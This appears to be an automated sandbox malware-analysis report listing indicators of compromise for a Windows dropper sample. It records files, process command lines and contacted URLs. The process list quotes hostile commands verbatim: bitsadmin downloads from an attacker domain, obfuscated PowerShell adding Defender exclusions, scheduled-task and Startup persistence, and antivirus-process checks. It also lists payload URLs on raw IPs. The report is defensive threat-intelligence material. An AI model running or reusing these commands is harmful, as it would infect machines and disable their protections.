Automated Malware Analysis IOC Report for

Files

File Path

Type

Category

Malicious

random.exe

PE32 executable (GUI) Intel 80386, for MS Windows

initial sample

C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com

PE32 executable (GUI) Intel 80386, for MS Windows

dropped

C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js

ASCII text, with no line terminators

dropped

C:\Users\user\AppData\Local\EduGenius Studios Co\u

data

dropped

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\ADFoyxP[1].exe

PE32 executable (GUI) Intel 80386, for MS Windows

dropped

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\HmngBpR[1].exe

PE32+ executable (GUI) x86-64, for MS Windows

dropped

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\ReK7Ewx[1].exe

PE32 executable (GUI) Intel 80386, for MS Windows

dropped

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exe

PE32 executable (GUI) Intel 80386, for MS Windows

dropped

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[2].exe

PE32 executable (GUI) Intel 80386, for MS Windows

dropped

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[3].exe

PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows

modified

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\mAtJWNv[1].exe

PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

dropped

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\mIrI3a9[1].exe

PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

dropped

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe

PE32 executable (GUI) Intel 80386, for MS Windows

dropped

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\yUI6F6C[1].exe

PE32 executable (GUI) Intel 80386, for MS Windows

dropped

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\PfOHmro[1].exe

PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

dropped

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[1].exe

PE32 executable (GUI) Intel 80386, for MS Windows

dropped

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[2].exe

PE32 executable (GUI) Intel 80386, for MS Windows

dropped

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[3].exe

PE32 executable (GUI) Intel 80386, for MS Windows

dropped

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\v6Oqdnc[1].exe

PE32 executable (GUI) Intel 80386, for MS Windows

dropped

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\zY9sqWs[1].exe

PE32 executable (GUI) Intel 80386, for MS Windows

dropped

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\CgmaT61[1].exe

PE32 executable (GUI) Intel 80386, for MS Windows

dropped

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\FvbuInU[1].exe

PE32 executable (GUI) Intel 80386, for MS Windows

dropped

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\V0Bt74c[1].exe

PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

dropped

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\random[1].exe

PE32 executable (GUI) Intel 80386, for MS Windows

dropped

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\random[2].exe

PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows

dropped

C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe

PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

dropped

C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe

PE32 executable (GUI) Intel 80386, for MS Windows

dropped

C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe

PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

dropped

C:\Users\user\AppData\Local\Temp\10141530101\FvbuInU.exe

PE32 executable (GUI) Intel 80386, for MS Windows

dropped

C:\Users\user\AppData\Local\Temp\10141540101\v6Oqdnc.exe

PE32 executable (GUI) Intel 80386, for MS Windows

dropped

C:\Users\user\AppData\Local\Temp\10141550101\HmngBpR.exe

PE32+ executable (GUI) x86-64, for MS Windows

dropped

C:\Users\user\AppData\Local\Temp\10141560101\PfOHmro.exe

PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

dropped

C:\Users\user\AppData\Local\Temp\10141580101\mAtJWNv.exe

PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

dropped

C:\Users\user\AppData\Local\Temp\10141590101\CgmaT61.exe

PE32 executable (GUI) Intel 80386, for MS Windows

dropped

C:\Users\user\AppData\Local\Temp\10141600101\zY9sqWs.exe

PE32 executable (GUI) Intel 80386, for MS Windows

dropped

C:\Users\user\AppData\Local\Temp\10141610101\ADFoyxP.exe

PE32 executable (GUI) Intel 80386, for MS Windows

dropped

C:\Users\user\AppData\Local\Temp\10141620101\yUI6F6C.exe

PE32 executable (GUI) Intel 80386, for MS Windows

dropped

C:\Users\user\AppData\Local\Temp\10141630101\V0Bt74c.exe

PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

dropped

C:\Users\user\AppData\Local\Temp\10141640101\ReK7Ewx.exe

PE32 executable (GUI) Intel 80386, for MS Windows

dropped

C:\Users\user\AppData\Local\Temp\10141650101\61c1a86413.exe

PE32 executable (GUI) Intel 80386, for MS Windows

dropped

C:\Users\user\AppData\Local\Temp\10141660101\afdbfd8fdc.exe

PE32 executable (GUI) Intel 80386, for MS Windows

dropped

C:\Users\user\AppData\Local\Temp\10141670101\7fd483a527.exe

PE32 executable (GUI) Intel 80386, for MS Windows

dropped

C:\Users\user\AppData\Local\Temp\10141680101\26335e66aa.exe

PE32 executable (GUI) Intel 80386, for MS Windows

dropped

C:\Users\user\AppData\Local\Temp\10141690101\8c12a2b1f0.exe

PE32 executable (GUI) Intel 80386, for MS Windows

dropped

C:\Users\user\AppData\Local\Temp\10141700101\b794b2f69e.exe

PE32 executable (GUI) Intel 80386, for MS Windows

dropped

C:\Users\user\AppData\Local\Temp\10141720101\a2528907a0.exe

PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows

dropped

C:\Users\user\AppData\Local\Temp\10141730101\d8be899fe4.exe

PE32 executable (GUI) Intel 80386, for MS Windows

dropped

C:\Users\user\AppData\Local\Temp\10141740101\48726a724d.exe

PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows

dropped

C:\Users\user\AppData\Local\Temp\789919\Occupation.com

PE32 executable (GUI) Intel 80386, for MS Windows

modified

C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe

PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows

dropped

C:\Users\user\AppData\Local\Temp\789919\q

data

dropped

C:\Users\user\AppData\Local\Temp\Activities.msi

data

dropped

C:\Users\user\AppData\Local\Temp\Anthropology.msi

data

dropped

C:\Users\user\AppData\Local\Temp\Contributors.msi

data

dropped

C:\Users\user\AppData\Local\Temp\Deviation.msi

Microsoft Cabinet archive data, 489756 bytes, 10 files, at 0x2c +A "Snowboard" +A "Invisible", ID 6412, number 1, 29 datablocks, 0x1 compression

dropped

C:\Users\user\AppData\Local\Temp\Dimension.msi

data

dropped

C:\Users\user\AppData\Local\Temp\Drug.msi

data

modified

C:\Users\user\AppData\Local\Temp\EdgeBHO.exe

PE32+ executable (GUI) x86-64, for MS Windows

dropped

C:\Users\user\AppData\Local\Temp\Having.msi

data

dropped

C:\Users\user\AppData\Local\Temp\Opens.msi

data

dropped

C:\Users\user\AppData\Local\Temp\Responding.msi

data

dropped

C:\Users\user\AppData\Local\Temp\Salem.msi

data

dropped

C:\Users\user\AppData\Local\Temp\Series.msi

data

dropped

C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe

PE32 executable (GUI) Intel 80386, for MS Windows

dropped

C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe:Zone.Identifier

ASCII text, with CRLF line terminators

modified

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url

MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js" >), ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Roaming\a.exe

PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

dropped

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_PfOHmro.exe_f21814579520aaf716722cd8e8d6b37c01d3088_3f61f46c_3ecadca5-d68b-4cdf-9332-15f5581deca1\Report.wer

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1350.tmp.dmp

Mini DuMP crash report, 15 streams, Sat Mar 8 14:47:19 2025, 0x1205a4 type

dropped

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1536.tmp.WERInternalMetadata.xml

XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\ProgramData\Microsoft\Windows\WER\Temp\WER15F2.tmp.xml

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\mIrI3a9.exe.log

ASCII text, with CRLF line terminators

modified

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\am_no[1].bat

DOS batch file, ASCII text, with very long lines (794), with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\EDM8nAR[1].bat

DOS batch file, Unicode text, UTF-8 (with BOM) text

dropped

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

data

dropped

C:\Users\user\AppData\Local\Temp\10131261121\EDM8nAR.cmd

DOS batch file, Unicode text, UTF-8 (with BOM) text

dropped

C:\Users\user\AppData\Local\Temp\10141511121\EDM8nAR.cmd

DOS batch file, Unicode text, UTF-8 (with BOM) text

dropped

C:\Users\user\AppData\Local\Temp\10141710121\am_no.cmd

DOS batch file, ASCII text, with very long lines (794), with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\Ae.msi

ASCII text, with very long lines (865), with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\Amend

data

dropped

C:\Users\user\AppData\Local\Temp\Challenges

data

dropped

C:\Users\user\AppData\Local\Temp\Digital

data

dropped

C:\Users\user\AppData\Local\Temp\Foul

data

dropped

C:\Users\user\AppData\Local\Temp\Fraud

data

dropped

C:\Users\user\AppData\Local\Temp\Gross

data

dropped

C:\Users\user\AppData\Local\Temp\Invisible

data

dropped

C:\Users\user\AppData\Local\Temp\Kate

data

dropped

C:\Users\user\AppData\Local\Temp\Snowboard

data

dropped

C:\Users\user\AppData\Local\Temp\Tells

data

dropped

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0zdeovab.1nx.ps1

ASCII text, with no line terminators

dropped

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fsvvflwo.xep.psm1

ASCII text, with no line terminators

dropped

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_husa4tdf.thr.ps1

ASCII text, with no line terminators

dropped

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ii30yyvo.13z.psm1

ASCII text, with no line terminators

dropped

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kqrgngf1.d4r.psm1

ASCII text, with no line terminators

dropped

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_weanavn4.wxi.ps1

ASCII text, with no line terminators

dropped

C:\Users\user\AppData\Local\Temp\ae.msi.bat

ASCII text, with very long lines (865), with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\tmp4079.tmp

SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8

dropped

C:\Users\user\AppData\Local\Temp\tmp408A.tmp

SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8

dropped

C:\Users\user\AppData\Local\Temp\tmp409A.tmp

SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8

dropped

C:\Users\user\AppData\Local\Temp\tmp40AB.tmp

SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8

dropped

C:\Users\user\AppData\Local\Temp\tmp40BC.tmp

SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8

dropped

C:\Users\user\AppData\Local\Temp\tmp40CC.tmp

SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3

dropped

C:\Users\user\AppData\Local\Temp\tmp40ED.tmp

dropped

C:\Users\user\AppData\Local\Temp\tmp4165.tmp

ASCII text, with very long lines (1024), with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\tmp4166.tmp

ASCII text, with very long lines (1024), with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\tmp4167.tmp

ASCII text, with very long lines (1024), with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\tmp4178.tmp

ASCII text, with very long lines (1024), with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\tmp4179.tmp

ASCII text, with very long lines (1024), with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\tmp417A.tmp

ASCII text, with very long lines (1024), with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\tmp417B.tmp

ASCII text, with very long lines (1024), with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\tmp418C.tmp

ASCII text, with very long lines (1024), with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Temp\tmp61D1.tmp

SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 2, database pages 20, cookie 0xc, schema 4, UTF-8, version-valid-for 2

dropped

C:\Users\user\AppData\Local\Temp\tmp61E2.tmp

SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 2, database pages 20, cookie 0xc, schema 4, UTF-8, version-valid-for 2

dropped

C:\Users\user\AppData\Local\Temp\tmp61F3.tmp

SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 2, database pages 20, cookie 0xc, schema 4, UTF-8, version-valid-for 2

dropped

C:\Users\user\AppData\Local\Temp\tmp61F4.tmp

SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 2, database pages 20, cookie 0xc, schema 4, UTF-8, version-valid-for 2

dropped

C:\Users\user\AppData\Local\Temp\tmp6204.tmp

SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 2, database pages 20, cookie 0xc, schema 4, UTF-8, version-valid-for 2

dropped

C:\Users\user\AppData\Local\Temp\tmp6215.tmp

SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 2, database pages 20, cookie 0xc, schema 4, UTF-8, version-valid-for 2

dropped

C:\Users\user\AppData\Local\Temp\tmp6216.tmp

SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 4, database pages 68, cookie 0x4a, schema 4, UTF-8, version-valid-for 4

dropped

C:\Users\user\AppData\Local\Temp\tmp6227.tmp

SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 4, database pages 68, cookie 0x4a, schema 4, UTF-8, version-valid-for 4

dropped

C:\Users\user\AppData\Local\Temp\tmp6237.tmp

SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 4, database pages 68, cookie 0x4a, schema 4, UTF-8, version-valid-for 4

dropped

C:\Users\user\AppData\Local\Temp\tmp975.tmp

SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8

dropped

C:\Users\user\AppData\Local\Temp\tmp9A21.tmp

SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 4, database pages 68, cookie 0x4a, schema 4, UTF-8, version-valid-for 4

dropped

C:\Users\user\AppData\Local\Temp\tmp9A31.tmp

SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 4, database pages 68, cookie 0x4a, schema 4, UTF-8, version-valid-for 4

dropped

C:\Users\user\AppData\Local\Temp\tmp9A32.tmp

SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 4, database pages 68, cookie 0x4a, schema 4, UTF-8, version-valid-for 4

dropped

C:\Users\user\AppData\Local\Temp\tmp9A43.tmp

SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 4, database pages 68, cookie 0x4a, schema 4, UTF-8, version-valid-for 4

dropped

C:\Users\user\AppData\Local\Temp\tmp9A5.tmp

SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8

dropped

C:\Users\user\AppData\Local\Temp\tmp9A54.tmp

SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 4, database pages 68, cookie 0x4a, schema 4, UTF-8, version-valid-for 4

dropped

C:\Users\user\AppData\Local\Temp\tmp9A64.tmp

SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 4, database pages 68, cookie 0x4a, schema 4, UTF-8, version-valid-for 4

dropped

C:\Users\user\AppData\Local\Temp\tmp9A75.tmp

SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 4, database pages 68, cookie 0x4a, schema 4, UTF-8, version-valid-for 4

dropped

C:\Users\user\AppData\Local\Temp\tmp9A85.tmp

SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 4, database pages 68, cookie 0x4a, schema 4, UTF-8, version-valid-for 4

dropped

C:\Users\user\AppData\Local\Temp\tmp9B6.tmp

SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8

dropped

C:\Users\user\AppData\Local\Temp\tmp9C6.tmp

SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8

dropped

C:\Users\user\AppData\Local\Temp\tmp9D7.tmp

SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8

dropped

C:\Users\user\AppData\Local\Temp\tmp9E7.tmp

SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8

dropped

C:\Users\user\AppData\Local\Temp\tmpD202.tmp

SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 4, database pages 68, cookie 0x4a, schema 4, UTF-8, version-valid-for 4

dropped

C:\Users\user\AppData\Local\Temp\tmpD222.tmp

SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1

dropped

C:\Users\user\AppData\Local\Temp\tmpD232.tmp

SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1

dropped

C:\Users\user\AppData\Local\Temp\tmpD233.tmp

SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1

dropped

C:\Users\user\AppData\Local\Temp\tmpD244.tmp

SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1

dropped

C:\Users\user\AppData\Local\Temp\tmpD255.tmp

SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1

dropped

C:\Users\user\AppData\Local\Temp\tmpD256.tmp

SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1

dropped

C:\Users\user\AppData\Local\Temp\tmpD266.tmp

SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8

dropped

C:\Windows\Tasks\rapes.job

data

dropped

C:\Windows\appcompat\Programs\Amcache.hve

MS Windows registry file, NT/2000 or above

dropped

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

MS Windows registry file, NT/2000 or above

dropped

\Device\ConDrv

ASCII text, with CRLF, CR, LF line terminators

dropped

\Device\Null

ASCII text, with CRLF line terminators

dropped

There are 137 hidden files, click here to show them.

Processes

Path

Cmdline

Malicious

C:\Users\user\Desktop\random.exe

"C:\Users\user\Desktop\random.exe"

C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\user~1\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\user~1\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\user~1\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\user~1\AppData\Local\Temp\10131261121\EDM8nAR.cmd"

C:\Windows\SysWOW64\bitsadmin.exe

bitsadmin /transfer "DownloadVrep" https://authenticatior.com/vrep.msi "C:\Users\user~1\AppData\Local\Temp\vrep_install\vrep.msi"

C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe

"C:\Users\user~1\AppData\Local\Temp\10136120101\PfOHmro.exe"

C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe

"C:\Users\user~1\AppData\Local\Temp\10136120101\PfOHmro.exe"

C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe

"C:\Users\user~1\AppData\Local\Temp\10136120101\PfOHmro.exe"

C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe

"C:\Users\user~1\AppData\Local\Temp\10136120101\PfOHmro.exe"

C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe

"C:\Users\user~1\AppData\Local\Temp\10141220101\ReK7Ewx.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c expand Ae.msi Ae.msi.bat & Ae.msi.bat

C:\Windows\SysWOW64\findstr.exe

findstr /I "opssvc wrsa"

C:\Windows\SysWOW64\findstr.exe

findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 789919

C:\Windows\SysWOW64\findstr.exe

findstr /V "Brian" Challenges

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b 789919\Occupation.com + Kate + Invisible + Tells + Gross + Amend + Foul + Snowboard + Digital + Fraud 789919\Occupation.com

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b ..\Drug.msi + ..\Contributors.msi + ..\Anthropology.msi + ..\Activities.msi + ..\Opens.msi + ..\Having.msi + ..\Dimension.msi + ..\Responding.msi + ..\Series.msi + ..\Salem.msi q

C:\Users\user\AppData\Local\Temp\789919\Occupation.com

Occupation.com q

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\user~1\AppData\Local\Temp\10141511121\EDM8nAR.cmd"

C:\Windows\SysWOW64\bitsadmin.exe

bitsadmin /transfer "DownloadVrep" https://authenticatior.com/vrep.msi "C:\Users\user~1\AppData\Local\Temp\vrep_install\vrep.msi"

C:\Windows\SysWOW64\cmd.exe

cmd /c schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F

C:\Windows\SysWOW64\cmd.exe

cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url" & echo URL="C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url" & exit

C:\Windows\SysWOW64\bitsadmin.exe

bitsadmin /transfer "DownloadClient" https://authenticatior.com/Client32.ini "C:\Users\user~1\AppData\Local\Temp\vrep_install\Client32.ini"

C:\Windows\System32\wscript.exe

C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js"

C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com

"C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com" "C:\Users\user\AppData\Local\EduGenius Studios Co\u"

C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe

"C:\Users\user~1\AppData\Local\Temp\10141520101\mIrI3a9.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'"

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\fltMC.exe

fltmc

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6776 -s 804

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\expand.exe

expand Ae.msi Ae.msi.bat

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\extrac32.exe

extrac32 /Y /E Deviation.msi

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\fltMC.exe

fltmc

C:\Windows\SysWOW64\choice.exe

choice /d y /t 5

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\wbem\WmiPrvSE.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

There are 35 hidden processes, click here to show them.

URLs

Name

Malicious

http://176.113.115.7/files/martin2/random.exed3e

unknown

http://176.113.115.7/files/unique2/random.exe9

unknown

https://authenticatior.com/vrep.msi

unknown

http://176.113.115.7/steam/random.exeS

unknown

http://176.113.115.7/off/random.exe

unknown

http://176.113.115.7/test/exe/random.exe

unknown

http://176.113.115.7/luma/random.exep

unknown

http://176.113.115.7/off/random.exe8

unknown

http://176.113.115.7/luma/random.exed

unknown

http://176.113.115.7/files/martin2/random.exem

unknown

http://176.113.115.7/files/qqdoup/random.exeG

unknown

http://176.113.115.7/files/martin2/random.exed

unknown

http://176.113.115.7/well/random.exehp

unknown

https://authenticatior.com/Client32.ini

unknown

http://176.113.115.7/files/teamex_support/random.exe

unknown

101.99.92.190:40919

http://176.113.115.7/well/random.exe

unknown

http://176.113.115.7/files/martin2/random.exe

unknown

http://101.99.92.190:4449

unknown

https://duckduckgo.com/ac/?q=

unknown

http://176.113.115.7/files/7821444099/mIrI3a9.exe

unknown

http://176.113.115.7/files/7868598855/zY9sqWs.exe1dac97d7aee7fl

unknown

http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX

unknown

http://176.113.115.7/files/5526411762/CgmaT61.exe

unknown

http://tempuri.org/

unknown

http://101.99.92.190:40919/

unknown

http://176.113.115.7/files/6386900832/PfOHmro.exe-

unknown

https://authenticatior.com/vrep.msiC:

unknown

https://www.autoitscript.com/autoit3/

unknown

http://tempuri.org/Endpoint/SetEnvironment

unknown

http://tempuri.org/Endpoint/SetEnvironmentResponse

unknown

http://tempuri.org/Endpoint/GetUpdates

unknown

https://aka.ms/pscore6lB

unknown

https://nuget.org/nuget.exe

unknown

https://authenticatior.com/vrep.msiLMEMH

unknown

http://tempuri.org/Endpoint/VerifyUpdate

unknown

http://176.113.115.7/files/5526411762/yUI6F6C.exew

unknown

http://101.99.92.190:4449/EdgeBHO.exe

unknown

http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

unknown

http://176.113.115.7/files/7834629666/v6Oqdnc.exe

unknown

http://176.113.115.6/46122658-3693405117-2476756634-1003

unknown

https://mozilla.org0/

unknown

http://pesterbdd.com/images/Pester.png

unknown

http://schemas.xmlsoap.org/soap/encoding/

unknown

